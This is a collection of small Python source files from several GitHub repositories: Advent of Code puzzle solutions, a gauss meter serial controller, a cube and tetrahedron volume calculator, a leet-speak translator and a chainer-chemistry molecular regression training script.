#### File: 2020/10/p2.py
```python
from collections import defaultdict
def solve(input):
xs = list(map(int, input.split()))
xs.append(0)
xs.sort()
xs.append(xs[-1] + 3)
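    # aux[j] accumulates the number of valid chains ending at joltage j, so each
    # adapter just sums the counts for the joltages 1-3 below it.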
dp = [0] * (len(xs) + 1)
aux = defaultdict(int)
aux[0] = dp[0] = 1
for i in range(1, len(xs) + 1):
dp[i] = sum(aux[xs[i - 1] - d] for d in range(1, 4))
aux[xs[i - 1]] += dp[i]
return dp[len(xs)]
```
#### File: 2021/02/p2.py
```python
from collections import defaultdict, Counter, deque
from functools import cache
import math
import re
import itertools
import sys
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
with open(sys.argv[1]) as f:
input = f.read()
def solve(input):
h_pos = depth = aim = 0
for inst in input.split("\n"):
typ, n = inst.split()
n = int(n)
if typ == "forward":
h_pos += n
depth += aim * n
elif typ == "down":
aim += n
else:
aim -= n
return h_pos * depth
print(solve(input.rstrip("\n")))
```
#### File: 2021/03/p2.py
```python
from collections import defaultdict, Counter, deque
from functools import cache
import math
import re
import itertools
import sys
import operator
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
with open(sys.argv[1]) as f:
input = f.read()
def solve(input):
l = len(input.split()[0])
xs = lmap(lambda x: int(x, 2), input.split())
def calc(choose, pref):
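        # Repeatedly keep the numbers whose bit i matches the chosen criterion
        # (most/least common, with `pref` breaking ties) until one value remains.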
selected = xs
i = l - 1
while i >= 0 and len(selected) > 1:
cnt = [0, 0]
for x in selected:
cnt[(x >> i) & 1] += 1
f = pref if cnt[0] == cnt[1] else int(choose(cnt[1], cnt[0]))
selected = [x for x in selected if ((x >> i) & 1) == f]
i -= 1
return selected[0]
return calc(operator.gt, 1) * calc(operator.lt, 0)
print(solve(input.rstrip("\n")))
```
#### File: 2021/06/p2.py
```python
import re
from functools import cache
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
@cache
def F(d, s):
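    # F(d, s): total fish descended from one fish with timer s after d days;
    # when the timer expires it resets to 6 and spawns a child with timer 8.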
reset_at = d - s - 1
if reset_at < 0:
return 1
return F(reset_at, 6) + F(reset_at, 8)
def solve(input):
return sum(F(256, x) for x in ints(re.findall(r"-?\d+", input)))
```
#### File: 2021/08/p2.py
```python
import itertools
def solve(input):
good = [
"abcefg",
"cf",
"acdeg",
"acdfg",
"bcdf",
"abdfg",
"abdefg",
"acf",
"abcdefg",
"abcdfg",
]
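    # Brute-force all 7! wire permutations: the one under which every observed
    # pattern becomes a valid digit is the true wiring and decodes the output.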
n = 0
for l in input.split("\n"):
observed, _, out = l.partition(" | ")
observed = observed.split()
for conf in itertools.permutations("abcdefg"):
trans = str.maketrans(dict(zip(conf, "abcdefg")))
if all("".join(sorted(w.translate(trans))) in good for w in observed):
n += int(
"".join(
str(good.index("".join(sorted(w.translate(trans)))))
for w in out.split()
)
)
return n
```
#### File: 2021/10/p2.py
```python
import statistics
def get_completion_points(s):
open, close = "([{<", ")]}>"
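    # Push the expected closing bracket for each opener; corrupted lines score 0,
    # otherwise the leftover stack (top = innermost) gives the completion score.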
stk = []
for c in s:
if c in open:
stk.append(close[open.index(c)])
elif not stk or stk.pop() != c:
return 0
score = 0
for c in reversed(stk):
score *= 5
score += close.index(c) + 1
return score
def solve(input):
return statistics.median(
filter(bool, (get_completion_points(s) for s in input.split()))
)
```
#### File: 2021/14/p2.py
```python
from collections import Counter
def solve(input):
paras = input.split("\n\n")
tmpl = paras[0]
insert = dict(map(lambda line: line.split(" -> "), paras[1].split("\n")))
pairs = Counter()
for a, b in zip(tmpl, tmpl[1:]):
pairs[a + b] += 1
first, last = tmpl[0:2], tmpl[-2:]
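    # Only pair counts matter: each rule splits one pair into two. Every letter
    # ends up counted twice across pairs except the two ends, tracked via first/last.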
for _ in range(40):
nxt_pairs = Counter()
for (a, c), n in pairs.items():
b = insert[a + c]
nxt_pairs[a + b] += n
nxt_pairs[b + c] += n
first = first[0] + insert[first]
last = insert[last] + last[1]
pairs = nxt_pairs
ctr = Counter()
for p, n in pairs.items():
ctr[p[0]] += n
ctr[p[1]] += n
most, *_, least = ctr.most_common()
def adjust(e):
return (e[1] + 1) // 2 if e[0] in (first[0], last[1]) else e[1] // 2
return adjust(most) - adjust(least)
```
#### File: 2021/15/p1.py
```python
from heapq import heappush, heappop
import math
adj4 = ((0, -1), (0, 1), (1, 0), (-1, 0))
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
def make_indexer(lst, default=None):
def get(*indices):
cur = lst
for i in indices:
if 0 <= i < len(cur):
cur = cur[i]
else:
return default
return cur
return get
def solve(input):
matrix = [ints(l) for l in input.split("\n")]
m, n = len(matrix), len(matrix[0])
get = make_indexer(matrix, -1)
heap = []
heappush(heap, (0, 0, 0))
best = [[math.inf] * n for _ in range(m)]
best[0][0] = 0
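    # Dijkstra over the grid: pop the cheapest unsettled cell and relax its
    # neighbours; stale heap entries are skipped by the best[i][j] != rsk check.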
while heap:
rsk, i, j = heappop(heap)
if best[i][j] != rsk:
continue
for dx, dy in adj4:
if get(i + dy, j + dx) != -1:
nxt_rsk = rsk + get(i + dy, j + dx)
if nxt_rsk < best[i + dy][j + dx]:
best[i + dy][j + dx] = nxt_rsk
heappush(heap, (nxt_rsk, i + dy, j + dx))
return best[-1][-1]
```
#### File: jo3-l/advent/template.py
```python
from collections import defaultdict, Counter, deque
from functools import cache
import math
import re
import itertools
import os
from heapq import heappush, heappop
adj4 = ((0, -1), (0, 1), (1, 0), (-1, 0))
adj8 = ((1, 0), (-1, 0), (0, 1), (0, -1), (1, -1), (1, 1), (-1, 1), (-1, -1))
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
def make_indexer(lst, default=None):
def get(*indices):
cur = lst
for i in indices:
if 0 <= i < len(cur):
cur = cur[i]
else:
return default
return cur
return get
def solve(input):
...
cur_dir = os.path.dirname(os.path.realpath(__file__))
def normalize_str(s):
return "\n".join([l.strip() for l in s.strip().splitlines()])
print("SAMPLE OUTPUT")
with open(os.path.join(cur_dir, "sample.txt")) as file:
print(solve(normalize_str(file.read())))
print("---")
print("OUTPUT")
with open(os.path.join(cur_dir, "input.txt")) as file:
print(solve(normalize_str(file.read())))
``` |
{
"source": "jo3-l/liftoff",
"score": 2
} |
#### File: src/parse/errors.py
```python
class SyntaxError(Exception):
def __init__(self, msg: str, line: int, col: int):
super().__init__(f"{line}:{col}: {msg}")
self.line = line
self.col = col
``` |
{
"source": "JO3QMA/TGRPC",
"score": 2
} |
#### File: JO3QMA/TGRPC/settings.py
```python
class Settings:
def __init__(self):
self.img_width = 256
self.img_height = 256
self.img_bg_color = (0, 0, 0)
self.img_margin = 8
self.element_ary = ["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","ᛆ","ᛖ","ᚺ","ᛁ","ᚷ","ᚲ","ᛜ","ᚦ","ᛏ","ᛉ"]
self.element_count = 40
self.element_font_min_size = 1
self.element_font_max_size = 32
self.element_font_path = './fonts/RuneAMN_Sans_1.20171016.otf'
self.element_font_color = (255, 255, 255)
``` |
{
"source": "jo675/labs",
"score": 4
} |
#### File: jo675/labs/lab1.py
```python
import math
calculations = 0
total_volume = 0
choice = ''
def number_of_calculations():
"""
Increment calculations.
"""
global calculations
calculations += 1
def total_volume_calculated(volume):
"""
    Add the given volume to the running total.
"""
global total_volume
total_volume += volume
def cube_volume():
"""
Calculate the volume of a cube.
"""
    a = float(input("Enter side of cube in cm "))
volume = a**3
return round(volume, 2)
def tetrahedron_volume():
"""
    Calculate the volume of a tetrahedron.
"""
    b = float(input("Enter side of tetrahedron in cm "))
volume = (b ** 3 / (6 * math.sqrt(2)))
return round(volume, 2)
def ask_user():
"""
Ask user what to calculate.
"""
try:
choice = input('select: ')
return choice
except:
return 0
def show_menu():
print('============================================')
print(' WELCOME ')
print('Press 1. Calculate the volume of a cube' )
print('Press 2. Calculate the volume of tetrahedron')
print('============================================')
show_menu()
while True:
choice = ask_user()
if choice == '1':
x = cube_volume()
print(f'The volume of your cube is {x} cm^3\n')
number_of_calculations()
total_volume_calculated(x)
elif choice == '2':
y = tetrahedron_volume()
        print(f'The volume of your tetrahedron is {y} cm^3\n')
number_of_calculations()
total_volume_calculated(y)
elif choice == 'Q':
print('Good bye')
break
else:
print('wrong option')
print(f'You have made calculations: {calculations}')
print(f'Your total volume calculated: {total_volume}')
```
#### File: jo675/labs/translate.py
```python
def translate_1(text):
    text = text.replace("a", "4")
    text = text.replace("b", "8")
    text = text.replace("e", "3")
    text = text.replace("l", "1")
    text = text.replace("o", "0")
    text = text.replace("s", "5")
    text = text.replace("t", "7")
    return text
trans_table = [('a', '4'), ("b", "8"), ("e", "3"), ("l", "1"), ("o", "0"), ("s", "5"), ("t", "7")]
def translate_2(text):
for i in range(len(trans_table)):
text = text.replace(*trans_table[i])
return text
the_string = input('enter a string: ')
translate1 = translate_1(the_string)
print(f'L33t H4x0R: {translate1}')
translate2 = translate_2(the_string)
print(f'L33t H4x0R: {translate2}')
``` |
{
"source": "jo6pak/StockQuote",
"score": 3
} |
#### File: jo6pak/StockQuote/StockQuote.py
```python
import time
import ystockquote
from termcolor import colored
from datetime import datetime
import Adafruit_CharLCD as LCD
import Adafruit_GPIO.MCP230xx as MCP
import logging
#####################################################################
# MCP23017 not working as advertised. Shows up as an I2C device
# but the LCD functions don't work properly. Investigate later; use GPIOs to
# drive the LCD for now.
#####################################################################
# Define MCP pins connected to the LCD.
#lcd_rs = 0
#lcd_en = 1
#lcd_d4 = 2
#lcd_d5 = 3
#lcd_d6 = 4
#lcd_d7 = 5
#lcd_backlight = 6
# Optionally if the backlight is not controllable then set:
# lcd_backlight = None
# Define LCD column and row size for 16x2 LCD.
#lcd_columns = 16
#lcd_rows = 2
# Initialize MCP23017 device using its default 0x20 I2C address.
#gpio = MCP.MCP23017()
# Initialize the LCD using the pins
#lcd = LCD.Adafruit_CharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,
# lcd_columns, lcd_rows, lcd_backlight, gpio=gpio)
##############################################################################
# Default: Initialize the LCD using the pins
lcd = LCD.Adafruit_CharLCDPlate()
lcd.clear()
# Define LCD column and row size for 16x2 LCD.
lcd_columns = 16
lcd_rows = 2
empty_space = ' '
##############################################################################
def post_quote(quote, price, change):
# Clear LCD, reset cursor
lcd.clear()
    # Set LCD backlight color to red or green
try:
if float(change) < 0:
lcd.set_color(1.0,0.0,0.0)
#print colored(elem + ": " + price + " " + change, 'red')
else:
lcd.set_color(0.0,1.0,0.0)
#print colored(elem + ": " + price + " " + change, 'green')
except Exception:
print("Debug: Post Quote exception")
pass
# Quote on first line + price info on second line
lcd.message(empty_space + quote + '\n' + empty_space + price + ' ' + change)
for i in range(lcd_columns):
time.sleep(0.35)
lcd.move_left()
return 0
##############################################################################
# Run in a loop
while 1:
with open('/home/pi/StockQuote/quotelist') as f:
tickerSymbol = f.read().splitlines()
    # Parse the ticker symbol list and print out the current price and the
    # change since the previous day's close for each symbol.
    for elem in tickerSymbol:
        try:
            allInfo = ystockquote.get_all(elem)
        except Exception:
            print("Debug: Hit Exception...ignore")
            continue
        post_quote(elem, allInfo["price"], allInfo["change"])
``` |
{
"source": "jo7oem/JiwaiCtl",
"score": 3
} |
#### File: JiwaiCtl/machines_controller/gauss_ctl.py
```python
import time
import pyvisa as visa
class GaussMeterOverRangeError(Exception):
pass
class GaussMeter:
def __init__(self) -> None:
self.__gs = visa.ResourceManager().open_resource("ASRL3::INSTR") # linux "ASRL/dev/ttyUSB0::INSTR"
def __query(self, command: str) -> str:
res = self.__gs.query(command)
return res.strip("\r\n")
def __write(self, command: str) -> None:
self.__gs.write(command)
def magnetic_field_fetch(self) -> float:
"""磁界の値を測定機器に問い合わせ,Gauss単位で返す
:return: 磁界の値(Gauss)
:rtype float
"""
try:
res = float(self.__query("FIELD?"))
except ValueError: # オーバーレンジ発生時の挙動
plobe_range = self.range_fetch()
if range == 0: # 30kOe以上の挙動
raise GaussMeterOverRangeError()
self.range_set(plobe_range - 1)
return self.magnetic_field_fetch()
multiplier = self.__query("FIELDM?")
if multiplier == "m":
res = float(res) * 10 ** (-3)
elif multiplier == "k":
res = float(res) * 1000
else:
pass
return res
def readable_magnetic_field_fetch(self) -> str:
"""磁界の値を測定機器に問い合わせ,人間が読みやすい形で返す
:return: 磁界の値
:rtype str
"""
field_str = self.__query("FIELD?") + self.__query("FIELDM?") + self.__query("UNIT?")
return field_str
def range_set(self, range_index: int) -> None:
"""
        Switch the measurement range.

        0: ~30.00 kOe
        1: ~3.000 kOe
        2: ~300.0 Oe
        3: ~30.00 Oe

        :param range_index: range index (0-3); out-of-range values fall back to 0
        :return: None
"""
if range_index < 0 or range_index > 3:
range_index = 0
self.__write("RANGE " + str(range_index))
time.sleep(0.2)
return
def range_fetch(self) -> int:
return int(self.__query("RANGE?"))
``` |
{
"source": "jo7ueb/chainer-chemistry",
"score": 3
} |
#### File: examples/own_dataset/train_own_dataset.py
```python
from __future__ import print_function
import chainer
import numpy
import os
import pickle
from argparse import ArgumentParser
from chainer.datasets import split_dataset_random
from chainer import cuda
from chainer import functions as F
from chainer import optimizers
from chainer import training
from chainer import Variable
from chainer.iterators import SerialIterator
from chainer.training import extensions as E
from sklearn.preprocessing import StandardScaler
from chainer_chemistry.dataset.converters import concat_mols
from chainer_chemistry.dataset.parsers import CSVFileParser
from chainer_chemistry.dataset.preprocessors import preprocess_method_dict
from chainer_chemistry.datasets import NumpyTupleDataset
from chainer_chemistry.models import MLP, NFP, GGNN, SchNet, WeaveNet, RSGCN, Regressor # NOQA
class GraphConvPredictor(chainer.Chain):
def __init__(self, graph_conv, mlp=None):
"""Initializes the graph convolution predictor.
Args:
graph_conv: The graph convolution network required to obtain
molecule feature representation.
mlp: Multi layer perceptron; used as the final fully connected
layer. Set it to `None` if no operation is necessary
after the `graph_conv` calculation.
"""
super(GraphConvPredictor, self).__init__()
with self.init_scope():
self.graph_conv = graph_conv
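            # Only register the MLP as a child link when it is a chainer.Link;
            # other values (e.g. None) are stored as a plain attribute below.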
if isinstance(mlp, chainer.Link):
self.mlp = mlp
if not isinstance(mlp, chainer.Link):
self.mlp = mlp
def __call__(self, atoms, adjs):
h = self.graph_conv(atoms, adjs)
if self.mlp:
h = self.mlp(h)
return h
class MeanAbsError(object):
def __init__(self, scaler=None):
"""Initializes the (scaled) mean absolute error metric object.
Args:
scaler: Standard label scaler.
"""
self.scaler = scaler
def __call__(self, x0, x1):
if isinstance(x0, Variable):
x0 = cuda.to_cpu(x0.data)
if isinstance(x1, Variable):
x1 = cuda.to_cpu(x1.data)
if self.scaler is not None:
scaled_x0 = self.scaler.inverse_transform(cuda.to_cpu(x0))
scaled_x1 = self.scaler.inverse_transform(cuda.to_cpu(x1))
diff = scaled_x0 - scaled_x1
else:
diff = cuda.to_cpu(x0) - cuda.to_cpu(x1)
return numpy.mean(numpy.absolute(diff), axis=0)[0]
class RootMeanSqrError(object):
def __init__(self, scaler=None):
"""Initializes the (scaled) root mean square error metric object.
Args:
scaler: Standard label scaler.
"""
self.scaler = scaler
def __call__(self, x0, x1):
if isinstance(x0, Variable):
x0 = cuda.to_cpu(x0.data)
if isinstance(x1, Variable):
x1 = cuda.to_cpu(x1.data)
if self.scaler is not None:
scaled_x0 = self.scaler.inverse_transform(cuda.to_cpu(x0))
scaled_x1 = self.scaler.inverse_transform(cuda.to_cpu(x1))
diff = scaled_x0 - scaled_x1
else:
diff = cuda.to_cpu(x0) - cuda.to_cpu(x1)
return numpy.sqrt(numpy.mean(numpy.power(diff, 2), axis=0)[0])
class ScaledAbsError(object):
def __init__(self, scaler=None):
"""Initializes the (scaled) absolute error object.
Args:
scaler: Standard label scaler.
"""
self.scaler = scaler
def __call__(self, x0, x1):
if isinstance(x0, Variable):
x0 = cuda.to_cpu(x0.data)
if isinstance(x1, Variable):
x1 = cuda.to_cpu(x1.data)
if self.scaler is not None:
scaled_x0 = self.scaler.inverse_transform(cuda.to_cpu(x0))
scaled_x1 = self.scaler.inverse_transform(cuda.to_cpu(x1))
diff = scaled_x0 - scaled_x1
else:
diff = cuda.to_cpu(x0) - cuda.to_cpu(x1)
return numpy.mean(numpy.absolute(diff), axis=0)[0]
def set_up_predictor(method, n_unit, conv_layers, class_num):
"""Sets up the graph convolution network predictor.
Args:
method: Method name. Currently, the supported ones are `nfp`, `ggnn`,
`schnet`, `weavenet` and `rsgcn`.
n_unit: Number of hidden units.
conv_layers: Number of convolutional layers for the graph convolution
network.
class_num: Number of output classes.
Returns:
An instance of the selected predictor.
"""
predictor = None
mlp = MLP(out_dim=class_num, hidden_dim=n_unit)
if method == 'nfp':
print('Training an NFP predictor...')
nfp = NFP(out_dim=n_unit, hidden_dim=n_unit, n_layers=conv_layers)
predictor = GraphConvPredictor(nfp, mlp)
elif method == 'ggnn':
print('Training a GGNN predictor...')
ggnn = GGNN(out_dim=n_unit, hidden_dim=n_unit, n_layers=conv_layers)
predictor = GraphConvPredictor(ggnn, mlp)
elif method == 'schnet':
        print('Training a SchNet predictor...')
schnet = SchNet(out_dim=class_num, hidden_dim=n_unit,
n_layers=conv_layers)
predictor = GraphConvPredictor(schnet, None)
elif method == 'weavenet':
print('Training a WeaveNet predictor...')
n_atom = 20
n_sub_layer = 1
weave_channels = [50] * conv_layers
weavenet = WeaveNet(weave_channels=weave_channels, hidden_dim=n_unit,
n_sub_layer=n_sub_layer, n_atom=n_atom)
predictor = GraphConvPredictor(weavenet, mlp)
elif method == 'rsgcn':
print('Training an RSGCN predictor...')
rsgcn = RSGCN(out_dim=n_unit, hidden_dim=n_unit, n_layers=conv_layers)
predictor = GraphConvPredictor(rsgcn, mlp)
else:
raise ValueError('[ERROR] Invalid method: {}'.format(method))
return predictor
def parse_arguments():
# Lists of supported preprocessing methods/models.
method_list = ['nfp', 'ggnn', 'schnet', 'weavenet', 'rsgcn']
scale_list = ['standardize', 'none']
# Set up the argument parser.
parser = ArgumentParser(description='Regression on own dataset')
parser.add_argument('--datafile', '-d', type=str,
default='dataset_train.csv',
help='csv file containing the dataset')
parser.add_argument('--method', '-m', type=str, choices=method_list,
help='method name', default='nfp')
parser.add_argument('--label', '-l', nargs='+',
default=['value1', 'value2'],
help='target label for regression')
parser.add_argument('--scale', type=str, choices=scale_list,
help='label scaling method', default='standardize')
parser.add_argument('--conv-layers', '-c', type=int, default=4,
help='number of convolution layers')
parser.add_argument('--batchsize', '-b', type=int, default=32,
help='batch size')
parser.add_argument('--gpu', '-g', type=int, default=-1,
                        help='id of gpu to use; negative value means running '
                             'the code on cpu')
parser.add_argument('--out', '-o', type=str, default='result',
help='path to save the computed model to')
parser.add_argument('--epoch', '-e', type=int, default=10,
help='number of epochs')
parser.add_argument('--unit-num', '-u', type=int, default=16,
help='number of units in one layer of the model')
parser.add_argument('--seed', '-s', type=int, default=777,
help='random seed value')
parser.add_argument('--train-data-ratio', '-r', type=float, default=0.7,
help='ratio of training data w.r.t the dataset')
parser.add_argument('--protocol', type=int, default=2,
help='pickle protocol version')
parser.add_argument('--model-filename', type=str, default='regressor.pkl',
help='saved model filename')
return parser.parse_args()
def main():
# Parse the arguments.
args = parse_arguments()
if args.label:
labels = args.label
class_num = len(labels) if isinstance(labels, list) else 1
else:
raise ValueError('No target label was specified.')
# Dataset preparation. Postprocessing is required for the regression task.
def postprocess_label(label_list):
return numpy.asarray(label_list, dtype=numpy.float32)
# Apply a preprocessor to the dataset.
print('Preprocessing dataset...')
preprocessor = preprocess_method_dict[args.method]()
parser = CSVFileParser(preprocessor, postprocess_label=postprocess_label,
labels=labels, smiles_col='SMILES')
dataset = parser.parse(args.datafile)['dataset']
# Scale the label values, if necessary.
if args.scale == 'standardize':
scaler = StandardScaler()
labels = scaler.fit_transform(dataset.get_datasets()[-1])
dataset = NumpyTupleDataset(*(dataset.get_datasets()[:-1] + (labels,)))
else:
scaler = None
# Split the dataset into training and validation.
train_data_size = int(len(dataset) * args.train_data_ratio)
train, _ = split_dataset_random(dataset, train_data_size, args.seed)
# Set up the predictor.
predictor = set_up_predictor(args.method, args.unit_num,
args.conv_layers, class_num)
# Set up the iterator.
train_iter = SerialIterator(train, args.batchsize)
# Set up the regressor.
metrics_fun = {'mean_abs_error': MeanAbsError(scaler=scaler),
'root_mean_sqr_error': RootMeanSqrError(scaler=scaler)}
regressor = Regressor(predictor, lossfun=F.mean_squared_error,
metrics_fun=metrics_fun, device=args.gpu)
# Set up the optimizer.
optimizer = optimizers.Adam()
optimizer.setup(regressor)
# Set up the updater.
updater = training.StandardUpdater(train_iter, optimizer, device=args.gpu,
converter=concat_mols)
# Set up the trainer.
print('Training...')
trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)
trainer.extend(E.snapshot(), trigger=(args.epoch, 'epoch'))
trainer.extend(E.LogReport())
trainer.extend(E.PrintReport(['epoch', 'main/loss', 'main/mean_abs_error',
'main/root_mean_sqr_error', 'elapsed_time']))
trainer.extend(E.ProgressBar())
trainer.run()
# Save the regressor's parameters.
model_path = os.path.join(args.out, args.model_filename)
print('Saving the trained model to {}...'.format(model_path))
regressor.save_pickle(model_path, protocol=args.protocol)
# Save the standard scaler's parameters.
if scaler is not None:
with open(os.path.join(args.out, 'scaler.pkl'), mode='wb') as f:
pickle.dump(scaler, f, protocol=args.protocol)
if __name__ == '__main__':
main()
``` |